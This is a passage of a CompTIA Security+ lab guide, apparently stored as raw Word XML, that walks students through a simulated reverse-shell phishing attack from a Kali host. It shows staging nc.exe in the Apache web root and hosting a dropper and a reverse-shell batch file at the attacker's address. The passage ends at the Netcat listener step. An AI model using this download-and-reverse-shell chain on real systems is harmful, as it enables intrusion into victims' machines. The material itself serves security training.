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8"/>
        </w:rPr>
        <w:t>CompTIA Security+ Lab Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Assisted Lab: Training and Awareness through Simulation (Reverse Shell Phishing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. Lab Overview &amp; CompTIA Security+ Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>This practical lab simulates a dual-perspective cyber incident: executing an attack via an external Linux system and observing the victim's compromise on an internal Windows Server. By stepping through both sides of a phishing campaign, you will explore pretext establishment, social engineering friction reduction, and outbound firewall traversal via reverse shell payloads.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1A365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Objective Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="1A365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CompTIA Security+ Specification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objective 2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Explain common threat vectors and attack surfaces (e.g., social engineering, malicious links, reverse shells).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Objective 5.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Given a scenario, implement security awareness practices (e.g., simulated phishing, recognizing suspicious communication).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. Lab Environment Specifications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2B6CB0"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="2B6CB0"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Operating System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="2B6CB0"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="2B6CB0"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IP / Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>KALI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>root / Pa$$w0rd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>203.0.113.66 (Attacker / C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MS10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Windows Server 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jaime / Pa$$w0rd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Internal Network (Victim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. Phase 1: Attacker Infrastructure &amp; Listener Setup (KALI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>In this phase, you stage the necessary exploit scripts and Netcat executable on the Kali web server, start Apache, and arm a Netcat listener to receive incoming reverse shell connections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 1: Access Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Connect to the KALI virtual machine console and authenticate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">• Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Pa$$w0rd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 2: Prepare Terminal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Open a Terminal window from the application dock and maximize the window for clarity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 3: Stage Netcat in the Web Root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Copy the Windows-compatible Netcat executable (nc.exe) from Kali's binaries repository into the local Apache web root directory (/var/www/html/):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/nc.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 4: Verify Web Directory Assets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Verify that nc.exe has been copied properly alongside the pre-configured batch scripts:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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ls -l /var/www/html/nc.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 5: Inspect Attack Payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Review the dropper script (rs-dl.bat) and the reverse shell execution script (reverse-shell.bat):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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cat /var/www/html/rs-dl.bat</w:t>
              <w:br/>
              <w:t>cat /var/www/html/reverse-shell.bat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top w:val="none"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1A365D"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1A365D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Script Analysis Summary</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>• rs-dl.bat (Remote Shell Download): Downloads nc.exe and reverse-shell.bat from the attacker's web server onto the victim machine.</w:t>
              <w:br/>
              <w:t>• reverse-shell.bat: Triggers Netcat on the victim system to initiate an outbound connection back to the attacker IP on port 7890.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 6: Start the Web Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Launch the Apache HTTP daemon so victim machines can fetch hosted files:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="F7FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="8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service apache2 start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top w:val="none"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1A365D"/>
              <w:bottom w:val="none"/>
              <w:right w:val="none"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1A365D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Lab Checkpoint: Apache Web Server Validation</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="2D3748"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Select the Score button in the lab interface to validate:</w:t>
              <w:br/>
              <w:t>http://203.0.113.66/rs-dl.bat verified ... http://203.0.113.66/reverse-shell.bat verified ... Task complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Step 7: Start the Netcat Reverse Shell Listener</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Action: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Configure Netcat to listen persistently for inbound connections originating from the compromised host on port 7890:</w:t>
